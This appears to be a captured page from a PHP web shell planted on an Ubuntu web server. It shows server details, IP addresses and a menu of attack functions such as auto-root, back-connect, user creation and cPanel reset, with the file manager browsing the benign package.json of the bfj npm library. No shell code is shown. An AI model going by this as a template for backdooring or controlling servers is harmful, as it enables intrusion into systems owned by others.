Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
bfj /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.eslintrc
4.99
KB
-rw-rw-rw-
.gitlab-ci.yml
318
B
-rw-rw-rw-
AUTHORS
152
B
-rw-rw-rw-
CONTRIBUTING.md
801
B
-rw-rw-rw-
COPYING
1.04
KB
-rw-rw-rw-
HISTORY.md
6.9
KB
-rw-rw-rw-
README.md
24.28
KB
-rw-rw-rw-
package.json
1.37
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "bfj", "version": "7.1.0", "description": "Big-friendly JSON. Asynchronous streaming functions for large JSON data sets.", "homepage": "https://gitlab.com/philbooth/bfj", "bugs": "https://gitlab.com/philbooth/bfj/issues", "license": "MIT", "author": "Phil Booth (https://gitlab.com/philbooth)", "main": "./src", "keywords": [ "json", "streamify", "stringify", "walk", "parse", "parser", "serialise", "serialize", "read", "write", "async", "asynchronous" ], "repository": { "type": "git", "url": "https://gitlab.com/philbooth/bfj.git" }, "engines": { "node": ">= 8.0.0" }, "dependencies": { "bluebird": "^3.7.2", "check-types": "^11.2.3", "hoopy": "^0.1.4", "jsonpath": "^1.1.1", "tryer": "^1.0.1" }, "devDependencies": { "axios": "^1.5.0", "chai": "^4.3.8", "eslint": "^8.48.0", "mocha": "^10.2.0", "please-release-me": "^2.1.4", "proxyquire": "^2.1.3", "spooks": "^2.0.0" }, "scripts": { "lint": "eslint src", "test": "npm run unit && npm run integration", "unit": "mocha --ui tdd --reporter spec --recursive --colors --slow 120 test/unit", "integration": "mocha --ui tdd --reporter spec --colors test/integration", "perf": "wget -O test/mtg.json http://mtgjson.com/json/AllSets-x.json && node test/performance mtg" } }
Close